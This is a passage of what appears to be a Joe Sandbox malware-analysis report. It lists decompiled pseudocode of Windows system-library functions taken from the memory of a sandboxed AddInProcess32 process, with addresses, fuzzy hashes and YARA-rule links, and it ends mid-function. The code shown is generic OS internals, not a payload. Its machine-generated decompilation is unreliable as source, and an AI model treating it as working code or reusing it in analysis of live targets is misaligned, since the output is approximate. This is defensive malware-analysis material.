					E0192165E(__ebx, 0x1948ae4, (__edx -  *0x1948b04 >> 0x14) + (__edx -  *0x1948b04 >> 0x14), __edi, __ecx, (__edx -  *0x1948b04 >> 0x14) + (__edx -  *0x1948b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0191AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01877D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0190FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01921074
0x01921080
0x01921082
0x0192108a
0x0192108f
0x01921093
0x019210ab
0x019210ab
0x019210c3
0x019210cf
0x019210e1
0x019210d1
0x019210da
0x019210da
0x019210e9
0x019210f5
0x019210f5
0x019210fe

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af9a1a306f152a9b8fe1a720ff3e0aa257b8f8f8033c18154054827cd4cbbf4
Instruction ID: e82c3f958cdf76eb6f4022e3f66282c7f80c990aab4c24221d45d58c7861da88
Opcode Fuzzy Hash: 5af9a1a306f152a9b8fe1a720ff3e0aa257b8f8f8033c18154054827cd4cbbf4
Instruction Fuzzy Hash: E6014C726447429FC711DF69C844F1A7BD9BBC4310F048529F98983695EE34D950CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0190FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0190FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x194d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0189FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01877D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0189B640(E01899AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0190fec0
0x0190fec0
0x0190fecf
0x0190fed9
0x0190fede
0x0190fee0
0x0190feeb
0x0190fef3
0x0190fef6
0x0190fef9
0x0190ff04
0x0190ff16
0x0190ff06
0x0190ff0f
0x0190ff0f
0x0190ff21
0x0190ff22
0x0190ff24
0x0190ff29
0x0190ff3e

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42eaeabc40a73958d0b6f86b1ba5ada05eea243c512181ed49a97ec725888c3f
Instruction ID: a9b198140a03ff78a15986e00f4e124f4dff5bdab69843797273ee1122a7c2be
Opcode Fuzzy Hash: 42eaeabc40a73958d0b6f86b1ba5ada05eea243c512181ed49a97ec725888c3f
Instruction Fuzzy Hash: 9D018471E01209AFDB14DBADD845FAEBBB8EF54710F04406AFA04EB280EA74DA01C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0190FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0190FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x194d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0189FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01877D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0189B640(E01899AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0190fe3f
0x0190fe3f
0x0190fe4e
0x0190fe58
0x0190fe5d
0x0190fe5f
0x0190fe6a
0x0190fe72
0x0190fe75
0x0190fe78
0x0190fe83
0x0190fe95
0x0190fe85
0x0190fe8e
0x0190fe8e
0x0190fea0
0x0190fea1
0x0190fea3
0x0190fea8
0x0190febd

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61005088e2fd0c4718075ec5c0077e24bd4acfedb44cebfdf677da45463d6700
Instruction ID: f0d55f54b9a6ca301ae11f56a8f77d8dfc2578a7eea7b77e886f2cc0fee2f94e
Opcode Fuzzy Hash: 61005088e2fd0c4718075ec5c0077e24bd4acfedb44cebfdf677da45463d6700
Instruction Fuzzy Hash: 8201B171A04209AFCB24DBA8D805EAEBBF8EF40B04F044066B900EB280DA34AA00C795

Uniqueness

Uniqueness Score: -1.00%

Function 01928A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01928A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x194d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01877D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0189B640(E01899AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01928a62
0x01928a71
0x01928a79
0x01928a82
0x01928a85
0x01928a89
0x01928a8c
0x01928a8f
0x01928a92
0x01928a95
0x01928a9f
0x01928ab1
0x01928aa1
0x01928aaa
0x01928aaa
0x01928abc
0x01928abd
0x01928abf
0x01928ac4
0x01928ada

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246b6b9965c28447844aaf859190b79e887453905d4ce96ef6439f8fdbcadece
Instruction ID: fcd0d968d09fda6336386b8de0ab9278f8a60c051bcac7a3de463395e8751ff3
Opcode Fuzzy Hash: 246b6b9965c28447844aaf859190b79e887453905d4ce96ef6439f8fdbcadece
Instruction Fuzzy Hash: B2012C75A0121DAFCB04DFADD941DAEBBF8EF58710F14405AF904E7341EA34AA00CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01928ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01928ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x194d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01877D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0189B640(E01899AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01928ed6
0x01928ee5
0x01928eed
0x01928ef0
0x01928efa
0x01928f03
0x01928f0c
0x01928f15
0x01928f24
0x01928f27
0x01928f31
0x01928f43
0x01928f33
0x01928f3c
0x01928f3c
0x01928f4e
0x01928f4f
0x01928f51
0x01928f56
0x01928f69

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec00b7f3897b3a2cfc62e86737317799d9d3f7a167fab64acacd580170c7bfe1
Instruction ID: 4d357497820d9fe9405ce633e343f83c7e742ff30e74ca8349490663f53ff753
Opcode Fuzzy Hash: ec00b7f3897b3a2cfc62e86737317799d9d3f7a167fab64acacd580170c7bfe1
Instruction Fuzzy Hash: 47111E70E002599FDB04DFA9D441FAEBBF4FF08300F0442AAE518EB381E6349A40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0185DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0185DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0185DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0185E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0185E8B0(__ecx, _t14, 0xfff);
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0185db64
0x0185db66
0x0185db6b
0x0185dbaa
0x0185db71
0x0185db76
0x0185db7a
0x0185dba3
0x0185db7c
0x0185db87
0x0185db8b
0x018b4fa1
0x018b4fb3
0x018b4fb8
0x0185db91
0x0185db96
0x0185db98
0x0185db98
0x0185db8b
0x0185db7a
0x0185db9d
0x0185dba2

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 2dfba4b928c1e854af63995f886ba1ff8464845fbe15436371ad60b8a794cf2f
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: F9F0C8332015239BD3725ADD4884B67BAABCF91BA1F150135BE05DB344C9608A0286D3

Uniqueness

Uniqueness Score: -1.00%

Function 0185B1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0185B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01877D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01877D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E018D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0185b1e8
0x0185b1ea
0x0185b1f3
0x018b4a17
0x0185b1f9
0x0185b1f9
0x0185b1f9
0x0185b201
0x018b4a21
0x018b4a2e
0x00000000
0x00000000
0x018b4a3b
0x018b4a4d
0x018b4a3d
0x018b4a46
0x018b4a46
0x018b4a55
0x00000000
0x00000000
0x00000000
0x0185b20a
0x0185b20a
0x0185b20a
0x0185b20a

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 259365518aad493ccec9ee4aeb9643f82801fb88ca9a7f196c3cd3c1da05cf5f
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: C301F932200684DBD322975DC848FA97F99EF51754F080061FE15CB7B2D774CA00C325

Uniqueness

Uniqueness Score: -1.00%

Function 018EFE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E018EFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x194d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01877D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0189B640(E01899AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x018efe96
0x018efe9e
0x018efea1
0x018efead
0x018efeb3
0x018efeb9
0x018efec3
0x018efed5
0x018efec5
0x018efece
0x018efece
0x018efee0
0x018efee1
0x018efee3
0x018efee8
0x018efefb

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10f04b4debb3e5060d112fd4ccd9f4dee0603409f773a3efc0a7b7a5e55cd9e
Instruction ID: 35800b7b074fbd768eb34b5ede4e45bdb99aa62962b3bbda1eb8697e449bbef8
Opcode Fuzzy Hash: b10f04b4debb3e5060d112fd4ccd9f4dee0603409f773a3efc0a7b7a5e55cd9e
Instruction Fuzzy Hash: 92016270A0020DAFCB14DFACD545A6EBBF4EF14704F144159A504EB382D635EA01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01886B90 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01886B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}

0x01886b96
0x01886b99
0x01886b9d
0x01886be9
0x01886beb
0x01886beb
0x01886bb3
0x01886bb3
0x01886bb5
0x01886bba
0x01886bc1
0x01886bc3
0x01886bc5
0x01886be0
0x01886be0
0x00000000
0x00000000
0x00000000
0x01886bc7
0x01886bc7
0x01886bd0
0x01886bd5
0x01886bd6
0x01886bd9
0x00000000
0x01886bc7
0x01886ba5
0x01886bac
0x00000000
0x00000000
0x01886bae
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
Instruction ID: ae1ff48293d9c6f7b6987a42f4fd1fc3ac08e36d5c25a49c1fbc09bd7ef6738e
Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
Instruction Fuzzy Hash: 7BF04975A00248DFDB18DE48C690AACBBB1FB44318F2844A8E606DB701E6399F00DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0191131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0191131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x194d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01877D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0189B640(E01899AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0191131b
0x0191132a
0x01911330
0x01911336
0x0191133e
0x01911341
0x01911344
0x0191134f
0x01911361
0x01911351
0x0191135a
0x0191135a
0x0191136c
0x0191136d
0x0191136f
0x01911374
0x01911387

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15073043c73de1b558e46a328255a6a0e5e36605c1f0f38addd35ccb2e72a3a2
Instruction ID: b4f2b390ebc8c3bcd21a0509abac04a26fc3155e8b2363a42ae22279aa9e2675
Opcode Fuzzy Hash: 15073043c73de1b558e46a328255a6a0e5e36605c1f0f38addd35ccb2e72a3a2
Instruction Fuzzy Hash: C0011975A0124DAFCB04EFA9D545AAEBBF4EF18700F404069B905EB385E634AB40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01928F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01928F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x194d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01877D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0189B640(E01899AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01928f6a
0x01928f79
0x01928f81
0x01928f84
0x01928f8b
0x01928f91
0x01928f94
0x01928f9e
0x01928fb0
0x01928fa0
0x01928fa9
0x01928fa9
0x01928fbb
0x01928fbc
0x01928fbe
0x01928fc3
0x01928fd6

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ea44f5927237a359aca7dc517d88c8f985b3576b0456e3e6de087668762339
Instruction ID: fdf69ea250fb6e7762b9585ec7e0ade8e8a2dd45ed154cbe9848b04c5b878448
Opcode Fuzzy Hash: 73ea44f5927237a359aca7dc517d88c8f985b3576b0456e3e6de087668762339
Instruction Fuzzy Hash: 35013C74A01209AFDB04EFA8D545EAEBBF8EF18300F104459F905EB380EA34EA00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01911608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01911608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x194d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01877D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0189B640(E01899AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01911608
0x01911617
0x0191161d
0x01911625
0x01911628
0x0191162b
0x01911636
0x01911648
0x01911638
0x01911641
0x01911641
0x01911653
0x01911654
0x01911656
0x0191165b
0x0191166e

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d96690a4c615f07b202fedb9af48580b2ac078674eea64b4a73e31f703de12
Instruction ID: c6a9dbe1e487cc707a00032046b0ace9644e97fd8a569ce1140da7f4ba3729bf
Opcode Fuzzy Hash: 36d96690a4c615f07b202fedb9af48580b2ac078674eea64b4a73e31f703de12
Instruction Fuzzy Hash: 0CF04F71A05248AFDB14DFA8D405E6EBBF4EF14300F044469A905EB281E6349A00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0187C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0187C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0187C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x18311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E019288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0187c577
0x0187c57d
0x0187c581
0x0187c5b5
0x0187c5b9
0x0187c5ce
0x0187c5ce
0x0187c5ca
0x00000000
0x0187c5ca
0x0187c5c4
0x0187c5c8
0x00000000
0x00000000
0x00000000
0x0187c5ad
0x00000000
0x0187c5af

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a9ac8ebc395103f27c20c6c31541334dfa6a052045a1d1da36fd59ddd9a589
Instruction ID: 9e60f3af8e9cc2f28467f7f2f49dba9813e3f1a0cbfcddb5dbeffd62dad94a6d
Opcode Fuzzy Hash: 26a9ac8ebc395103f27c20c6c31541334dfa6a052045a1d1da36fd59ddd9a589
Instruction Fuzzy Hash: 47F090B2915A979EE7368F1C8044B217FD4BB45778F444466F515C7102C7A6DE80C251

Uniqueness

Uniqueness Score: -1.00%

Function 01912073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01912073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0190FD22(__ecx);
				_t19 =  *0x194849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1948748; // 0x0
					if(__eflags <= 0) {
						E01911C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1948724 & 0x00000004;
							if(( *0x1948724 & 0x00000004) == 0) {
